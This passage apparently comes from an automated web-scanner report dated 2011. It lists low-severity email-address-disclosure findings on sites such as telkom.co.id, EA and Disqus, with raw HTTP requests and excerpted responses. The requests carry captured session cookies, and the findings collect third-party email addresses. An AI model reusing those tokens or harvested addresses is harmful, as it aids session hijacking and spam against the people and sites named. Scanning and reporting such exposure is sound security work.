<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Produc
...[SNIP]...
<br>email : info@tii.co.id</font>
...[SNIP]...
<br>email : mitratel@mitratel.co.id</font>
...[SNIP]...
22.4. http://beta.telkom.co.id/produk-layanan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /produk-layanan/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:15 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 467326
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>Produk
...[SNIP]...
<br>email : info@tii.co.id</font>
...[SNIP]...
<br>email : mitratel@mitratel.co.id</font>
...[SNIP]...
22.5. http://beta.telkom.co.id/theme/Standard/js/curvycorners.src.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /theme/Standard/js/curvycorners.src.js

Issue detail

The following email address was disclosed in the response:

Request

GET /theme/Standard/js/curvycorners.src.js HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:06 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
Last-Modified: Tue, 31 Aug 2010 08:12:24 GMT
ETag: "5b89-dfda-24132a00"
Accept-Ranges: bytes
Content-Length: 57306
Content-Type: application/x-javascript

/****************************************************************
* *
* CurvyCorners
...[SNIP]...
*
* Website: http://www.curvycorners.net *
* SVN: http://curvycorners.googlecode.com/ *
* Email: cameron@curvycorners.net *
* Discuss: http://groups.google.com/group/curvycorners *
* *
* Please consult the SVN for a l
...[SNIP]...
22.6. http://cdn.wn.com/or/js/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.wn.com
Path:   /or/js/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /or/js/jquery.hoverIntent.minified.js HTTP/1.1
Host: cdn.wn.com
Proxy-Connection: keep-alive
Referer: http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Type: application/javascript
Date: Fri, 24 Jun 2011 13:27:08 GMT
ETag: "844058907"
Expires: Fri, 08 Jul 2011 13:27:08 GMT
Last-Modified: Wed, 24 Feb 2010 10:59:54 GMT
Server: ECS (dca/53EE)
Via: 1.0 cdnorigin.wn.com (squid/3.1.11)
Warning: 113 cdnorigin.wn.com (squid/3.1.11) This cache hit is still fresh and more than 1 day old
X-Cache: HIT
X-Cache-Lookup: HIT from cdnorigin.wn.com:80
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
22.7. http://clicktoverify.truste.com/common/css/validate2_1_big.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /common/css/validate2_1_big.css

Issue detail

The following email address was disclosed in the response:

Request

GET /common/css/validate2_1_big.css HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:46 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Fri, 14 Jan 2011 01:56:56 GMT
ETag: "7f8012-181f-bfb82a00"
Accept-Ranges: bytes
Content-Length: 6175
Content-Type: text/css

@charset "utf-8";
/*
TRUSTe
Title: Validate CSS
Date: May 2009
Website: http://www.truste.com/
Author: Pasquale Scerbo (pscerbo@extractable.com)
*/


/*----------------- CSS NORMALIZER -----------------*/
/*
- cancels default styles applied to page elements
- adjusts default elements between browsers to same baseline
*/

div, dl, dt, dd, ul,
...[SNIP]...
22.8. http://clicktoverify.truste.com/css/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /css/styles.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/styles.css HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:46 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Thu, 13 Jan 2011 18:58:04 GMT
ETag: "81c023-a26e-e5bc4700"
Accept-Ranges: bytes
Content-Length: 41582
Content-Type: text/css

@charset "utf-8";
/*
TRUSTe
Title: Default CSS
Date: May/June 2009
Website: http://www.truste.com/
Author: Pasquale Scerbo (pscerbo@extractable.com)
*/


/*----------------- CSS NORMALIZER -----------------*/
/*
- cancels default styles applied to page elements
- adjusts default elements between browsers to same baseline
*/

div, dl, dt
...[SNIP]...
22.9. http://everquest2.com/_themes/global/javascript/validation/jquery_validationEngine.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://everquest2.com
Path:   /_themes/global/javascript/validation/jquery_validationEngine.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_themes/global/javascript/validation/jquery_validationEngine.js HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
Referer: http://everquest2.com/free_to_play
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en; JSESSIONID=165A3BD41682208A464466107E45F69E.sdt-foyert15-27609

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:27 GMT
Server: Apache/2.2.3
Last-Modified: Wed, 11 May 2011 02:50:33 GMT
ETag: "7a8169-63a4-22e69040"
Accept-Ranges: bytes
Content-Length: 25508
Content-Type: application/x-javascript

/*
* Inline Form Validation Engine 1.7, jQuery plugin
*
* Copyright(c) 2010, Cedric Dugas
* http://www.position-relative.net
*    
* Form validation engine allowing custom regex rules to be added.
...[SNIP]...
<br />";
                   }    
               }
           }    
           if (callerType == "select-one") { // added by paul@kinetek.net for select boxes, Thank you        
               if(!$(caller).val()) {
                   $.validationEngine.isError = true;
                   promptText += $.validationEngine.settings.allrules[rules[i]].alertText+"<br />";
               }
           }
           if (callerType == "select-multiple") { // added by paul@kinetek.net for select boxes, Thank you    
               if(!$(caller).find("option:selected").val()) {
                   $.validationEngine.isError = true;
                   promptText += $.validationEngine.settings.allrules[rules[i]].alertText+"<br
...[SNIP]...
22.10. http://everquest2.com/javascript/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://everquest2.com
Path:   /javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript/s_code.js HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
Referer: http://everquest2.com/free_to_play
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en; JSESSIONID=165A3BD41682208A464466107E45F69E.sdt-foyert15-27609; tsa1v691=uvid2e41e2ae9bb0e54440f0349f7c2d553588127; tsa1s691=usid2e41e2ae9bb0e54440f0349f7c2d553588127

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:30 GMT
Server: Apache/2.2.3
Last-Modified: Mon, 23 Aug 2010 20:38:33 GMT
ETag: "9f80ea-3f89-a1c8e440"
Accept-Ranges: bytes
Content-Length: 16265
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */


var s=s_gi(s_account)
/************************** CONFIG SECTION **********
...[SNIP]...
)`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=^
...[SNIP]...
22.11. http://hotels.asiawebdirect.com/scripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hotels.asiawebdirect.com
Path:   /scripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/s_code.js HTTP/1.1
Host: hotels.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://hotels.asiawebdirect.com/thailand/phuket/hotels/?mtxPortal=phuket.com&mtxDestinationId=75&mtxCatRange=1-5&mtxPriceRange=0-Unlimited&mtxCheckIn=20110624&mtxCheckOut=20110625&mtxSortBy=Category&mtxBoxName=phuket.com%20small%20box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=191982906.00014641700566752900:4:1; __utmxx=191982906.00014641700566752900:3251620:2592000; symfony=2f8967ec23269ed5ba0a930cec9f6d13

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:23 GMT
Server: Apache/2.2.17
Last-Modified: Mon, 28 Feb 2011 07:32:48 GMT
ETag: "6b26-49d52afbb2800"
Accept-Ranges: bytes
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:21:23 GMT
Vary: Accept-Encoding
Content-Length: 27430
Content-Type: application/javascript

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...
22.12. http://legal.ea.com/legal/legal.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legal.ea.com
Path:   /legal/legal.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /legal/legal.jsp?language=en HTTP/1.1
Host: legal.ea.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; evar1=Not%20Logged%20In; s_sivo=US%3AEACOM%3ANONE; s_cc=true; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A%252F%252Fwww.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA; s_ppv=7

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:46:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Expires: 0
Cache-Control: private
Content-Length: 108874


<html>
<head>
   <title>EA ONLINE PRIVACY POLICY and TERMS OF SERVICE</title>

   <link type="text/css" rel="stylesheet" media="screen" href="http://images.ea.com/legal/tos.css" />
</head>
...[SNIP]...
olicy is not to disclose personal information collected online to a third party for direct marketing purposes without your approval. If you choose to opt-out at any time after granting approval, email privacy_policy@ea.com or write to Privacy Policy Administrator, Electronic Arts Inc., 209 Redwood Shores Pkwy, Redwood City, CA 94065.</div>
...[SNIP]...
22.13. http://mediacdn.disqus.com/1308858010/build/system/disqus.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1308858010/build/system/disqus.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1308858010/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1308705797.10.10.utmcsr=thepostgame.com|utmccn=(referral)|utmcmd=referral|utmcct=/blog/style-points/201106/coolest-features-athletes-homes; __utma=113869458.981292312.1305368048.1308571889.1308705797.10

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 23 Jun 2011 19:46:19 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 170839
X-Varnish: 883333181
Cache-Control: max-age=2529509
Expires: Sat, 23 Jul 2011 20:05:22 GMT
Date: Fri, 24 Jun 2011 13:26:53 GMT
Connection: close

DISQUS.dtpl=function(){var b={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>",getGuestFields:function(a){function b(c){return DISQUS.nodes.get("#"+c+(a?"-"+a:""))}return{name:b("dsq-field-nam
...[SNIP]...
22.14. http://newerforms.wn.com/media/js/date.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newerforms.wn.com
Path:   /media/js/date.js

Issue detail

The following email address was disclosed in the response:

Request

GET /media/js/date.js HTTP/1.1
Host: newerforms.wn.com
Proxy-Connection: keep-alive
Referer: http://newerforms.wn.com/form/ad_enquiry/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=67; __unam=6e7de7f-130c1d53330-7dd7c096-1; __qca=P0-454446954-1308922039997

Response

HTTP/1.1 200 OK
Expires: Fri, 24 Jun 2011 15:57:19 GMT
Cache-Control: max-age=1
Content-Type: application/javascript
Accept-Ranges: bytes
ETag: "970786939"
Last-Modified: Wed, 02 Sep 2009 10:49:32 GMT
Content-Length: 11520
Date: Fri, 24 Jun 2011 15:57:18 GMT
Server: lighttpd/1.4.19

/*
* Date prototype extensions. Doesn't depend on any
* other code. Doens't overwrite existing methods.
*
* Adds dayNames, abbrDayNames, monthNames and abbrMonthNames static properties and isLeapY
...[SNIP]...
tDayName, getMonthName, getDayOfYear, getWeekOfYear,
* setDayOfYear, addYears, addMonths, addDays, addHours, addMinutes, addSeconds methods
*
* Copyright (c) 2006 J..rn Zaefferer and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*
* Additional methods and properties added by Kelvin Luck: firstDayOfWeek, dateFormat, zeroTime, asString, fromString -
* I've added my name to these methods so you kno
...[SNIP]...
22.15. http://newsletter.asiawebdirect.com/inxmail3/subscribe.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsletter.asiawebdirect.com
Path:   /inxmail3/subscribe.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /inxmail3/subscribe.jsp HTTP/1.1
Host: newsletter.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=191982906.00014641700566752900:4:1; __utmxx=191982906.00014641700566752900:3251620:2592000; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 22079
Date: Fri, 24 Jun 2011 13:22:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<b>newsletter@newsletter.asiawebdirect.com</b>
...[SNIP]...
22.16. https://softlayer.parallelsmarketplace.com/store/conf/86/lang/en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/conf/86/lang/en.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /store/conf/86/lang/en.js HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://softlayer.parallelsmarketplace.com/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; PHPSESSID=6a9429b7d6c03539695bbec853449bea

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 08 Dec 2010 01:14:07 GMT
ETag: "2270473-86d2-d67775c0"
Accept-Ranges: bytes
Content-Length: 34514
Content-Type: application/x-javascript
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

var locale = {
'&datetime_format_date':'%d-%m-%Y ',
'ACCOUNTNAME':'(e.g.: John) ',
'ACCOUNT_NAME':'Account Name ',
'ACCOUNT_NUMBER':'Account Number ',
'ACN_ABN':'A.C.N / A.B.N ',
'ADDITIONAL_PARAMETER
...[SNIP]...
':'Number ',
'FAX_NUMBER_TITLE':'Phone Number ',
'FIRST_NAME':'First Name ',
'FIRST_NAME_ENG':'First Name English ',
'FOOTER_COPYRIGHT':'&copy; 2010 Parallels. All rights reserved. ',
'FOOTER_MAILTO':'info@crucialserver.com ',
'FOOTER_PHONE':'+1 (703) 815-5670 ',
'February':'February ',
'First Name:':'First Name:',
'HEADER_LOGIN':'Login: ',
'HEADER_PASSWORD':'Password: ',
'HIDE_DOMAINS_MORE_OPTIONS':'Show Last Search Res
...[SNIP]...
ION_PERIOD_TEXT':'Subscription Period ',
'SUBSCRIPTION_SERVSTATUS':'Service status: ',
'SUBSCRIPTION_STATUS':'Status: ',
'SUNRISE_SALUTATION_MR':'Mr.',
'SUNRISE_SALUTATION_MS':'Ms.',
'SUPPORT_MAILTO':'support@crucialserver.com ',
'September':'September ',
'TAXREG':'Tax ',
'TERMS_OF_USE':'Terms of Use',
'THERE_IS_NO_SUCH_SUBSCR':'There is no such subscription.',
'THE_SAME_SERVICE_CAN_BE_ADDED_ONCE':'The same service can be a
...[SNIP]...
.g.: 123) ',
'TOOLTIP_CREDIT_CARD_HOLDER_NAME':'(e.g.: JOHN SMITH) ',
'TOOLTIP_CREDIT_CARD_ISSUE_NUMBER':'(e.g.: 2) ',
'TOOLTIP_CREDIT_CARD_NUMBER':'(e.g.: 4111111111111111) ',
'TOOLTIP_EMAIL':'(e.g.: tech_user@plates.com) ',
'TOOLTIP_EMAIL2':'(e.g.: tech_user@plates.com) ',
'TOOLTIP_EXP_DATE':' ',
'TOOLTIP_FIRST_NAME':'(e.g.: John) ',
'TOOLTIP_FIRST_NAME_ENG':'(e.g.: John) ',
'TOOLTIP_KATAKANA_NAME':'(e.g.: masahiro ono) ',
'TOOLTIP_LAST_NAME':'(e.g.: Smith) ',
'TOOL
...[SNIP]...
22.17. https://softlayer.parallelsmarketplace.com/store/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="text" name="EmailID" size="25" maxlength="100" title="Email Address " id="EmailID" autocomplete="" class=" widgetText" value="test@fastdial.net" _required="1" validateError="Validation failed " size="25" />
...[SNIP]...
<div class="fieldComment">(e.g.: tech_user@plates.com) </div>
...[SNIP]...
<input type="text" name="Email2ID" size="25" maxlength="100" title="Confirm Email Address " id="Email2ID" autocomplete="" class=" widgetText" value="test@fastdial.net" _required="1" validateError="Validation failed " size="25" />
...[SNIP]...
<div class="fieldComment">(e.g.: tech_user@plates.com) </div>
...[SNIP]...
<div class="fieldComment">(e.g.: tech_user@plates.com) </div>
...[SNIP]...
22.18. http://static.asiawebdirect.com/premium/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.asiawebdirect.com
Path:   /premium/js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /premium/js/s_code.js HTTP/1.1
Host: static.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
